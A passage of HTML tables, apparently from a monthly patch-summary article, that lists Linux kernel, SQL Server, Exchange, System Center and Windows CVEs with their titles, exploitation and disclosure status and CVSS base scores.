style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39929"><span style='font-size: undefined;'>CVE-2025-39929</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>smb: client: fix smbdirect_recv_io leak in smbd_negotiate() error path</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39895"><span style='font-size: undefined;'>CVE-2025-39895</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>sched: Fix sched_numa_find_nth_cpu() if mask offline</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39949"><span style='font-size: undefined;'>CVE-2025-39949</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>qed: Don't collect too many protection override GRC elements</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39920"><span style='font-size: undefined;'>CVE-2025-39920</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>pcmcia: Add error handling for add_interval() in do_validate_mem()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39937"><span style='font-size: undefined;'>CVE-2025-39937</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net: rfkill: gpio: Fix crash due to dereferencering uninitialized pointer</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39947"><span style='font-size: undefined;'>CVE-2025-39947</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>net/mlx5e: Harden uplink netdev access against device unbind</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-50502"><span style='font-size: undefined;'>CVE-2022-50502</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm: /proc/pid/smaps_rollup: fix no vma's null-deref</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39902"><span style='font-size: undefined;'>CVE-2025-39902</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/slub: avoid accessing metadata when pointer is invalid in object_err()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39916"><span style='font-size: undefined;'>CVE-2025-39916</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/damon/reclaim: avoid divide-by-zero in damon_reclaim_apply_parameters()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39909"><span style='font-size: undefined;'>CVE-2025-39909</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>mm/damon/lru_sort: avoid divide-by-zero in damon_lru_sort_apply_parameters()</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39942"><span style='font-size: undefined;'>CVE-2025-39942</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ksmbd: smbdirect: verify remaining_data_length respects max_fragmented_recv_size</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39934"><span style='font-size: undefined;'>CVE-2025-39934</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>drm: bridge: anx7625: Fix NULL pointer dereference with early IRQ</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39923"><span style='font-size: undefined;'>CVE-2025-39923</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>dmaengine: qcom: bam_dma: Fix DT error handling for num-channels/ees</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39931"><span style='font-size: undefined;'>CVE-2025-39931</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>crypto: af_alg - Set merge to zero early in af_alg_sendmsg</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39953"><span style='font-size: undefined;'>CVE-2025-39953</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>cgroup: split cgroup_destroy_wq into 3 workqueues</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39938"><span style='font-size: undefined;'>CVE-2025-39938</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ASoC: qcom: q6apm-lpass-dais: Fix NULL pointer dereference if source graph failed</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.5</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-59288"><span style='font-size: undefined;'>CVE-2025-59288</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Playwright Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>5.3</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39927"><span style='font-size: undefined;'>CVE-2025-39927</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>ceph: fix race condition validating r_parent before applying state</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4.7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39957"><span style='font-size: undefined;'>CVE-2025-39957</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>wifi: mac80211: increase scan_ies_len for S1G</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39958"><span style='font-size: undefined;'>CVE-2025-39958</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>iommu/s390: Make attach succeed when the device was surprise removed</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-39911"><span style='font-size: undefined;'>CVE-2025-39911</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>i40e: fix IRQ freeing in i40e_vsi_request_irq_msix error path</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>3.3</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>SQL Server vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:14.743589743589745%"/><col style="width:36.217948717948715%"/><col style="width:13.782051282051283%"/><col style="width:18.108974358974358%"/><col style="width:17.147435897435898%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59250"><span style='font-size: undefined;'>CVE-2025-59250</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>JDBC Driver for SQL Server Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.1</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Server Software vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.942307692307693%"/><col style="width:38.621794871794876%"/><col style="width:13.782051282051283%"/><col style="width:17.307692307692307%"/><col style="width:16.346153846153847%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59249"><span style='font-size: undefined;'>CVE-2025-59249</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53782"><span style='font-size: undefined;'>CVE-2025-53782</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59248"><span style='font-size: undefined;'>CVE-2025-59248</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Exchange Server Spoofing Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.5</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>System Center vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:13.942307692307693%"/><col style="width:38.30128205128205%"/><col style="width:13.782051282051283%"/><col style="width:17.467948717948715%"/><col style="width:16.506410256410255%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59213"><span style='font-size: undefined;'>CVE-2025-59213</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Configuration Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.4</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59497"><span style='font-size: undefined;'>CVE-2025-59497</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Defender for Linux Denial of Service Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55320"><span style='font-size: undefined;'>CVE-2025-55320</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Configuration Manager Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>6.7</span></p></td></tr></tbody></table><h3 style="direction: ltr;"><strong>Windows vulnerabilities</strong></h3><table><colgroup data-width='1250'><col style="width:11.37820512820513%"/><col style="width:45.3525641025641%"/><col style="width:13.782051282051283%"/><col style="width:15.384615384615385%"/><col style="width:14.102564102564102%"/></colgroup><tbody><tr><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>CVE</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Title</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Exploited?</strong></span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'><strong>Publicly disclosed?</strong></span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'><strong>CVSSv3 base score</strong></span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49708"><span style='font-size: undefined;'>CVE-2025-49708</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft Graphics Component Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>9.9</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58715"><span style='font-size: undefined;'>CVE-2025-58715</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Speech Runtime Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58716"><span style='font-size: undefined;'>CVE-2025-58716</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Speech Runtime Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>8.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53768"><span style='font-size: undefined;'>CVE-2025-53768</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Xbox IStorageService Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55339"><span style='font-size: undefined;'>CVE-2025-55339</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Network Driver Interface Specification Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59207"><span style='font-size: undefined;'>CVE-2025-59207</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50152"><span style='font-size: undefined;'>CVE-2025-50152</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Kernel Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55328"><span style='font-size: undefined;'>CVE-2025-55328</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Hyper-V Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59241"><span style='font-size: undefined;'>CVE-2025-59241</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Health and Optimized Experiences Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55694"><span style='font-size: undefined;'>CVE-2025-55694</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Error Reporting Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-53150"><span style='font-size: undefined;'>CVE-2025-53150</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Digital Media Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-50175"><span style='font-size: undefined;'>CVE-2025-50175</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Digital Media Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55677"><span style='font-size: undefined;'>CVE-2025-55677</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Device Association Broker Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59255"><span style='font-size: undefined;'>CVE-2025-59255</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows DWM Core Library Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58720"><span style='font-size: undefined;'>CVE-2025-58720</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cryptographic Services Information Disclosure Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59191"><span style='font-size: undefined;'>CVE-2025-59191</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Connected Devices Platform Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55680"><span style='font-size: undefined;'>CVE-2025-55680</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58728"><span style='font-size: undefined;'>CVE-2025-58728</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Bluetooth Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59290"><span style='font-size: undefined;'>CVE-2025-59290</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Windows Bluetooth Service Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59192"><span style='font-size: undefined;'>CVE-2025-59192</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Storport.sys Driver Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59199"><span style='font-size: undefined;'>CVE-2025-59199</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Software Protection Platform (SPP) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-55696"><span style='font-size: undefined;'>CVE-2025-55696</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>NtQueryInformation Token function (ntifs.h) Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-58722"><span style='font-size: undefined;'>CVE-2025-58722</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft DWM Core Library Elevation of Privilege Vulnerability</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>No</span></p></td><td><p style="text-align: right;direction: ltr;"><span style='font-size: undefined;'>7.8</span></p></td></tr><tr><td><p style="direction: ltr;"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-59254"><span style='font-size: undefined;'>CVE-2025-59254</span></a></p></td><td><p style="direction: ltr;"><span style='font-size: undefined;'>Microsoft DWM Core Library Elevation of Privilege 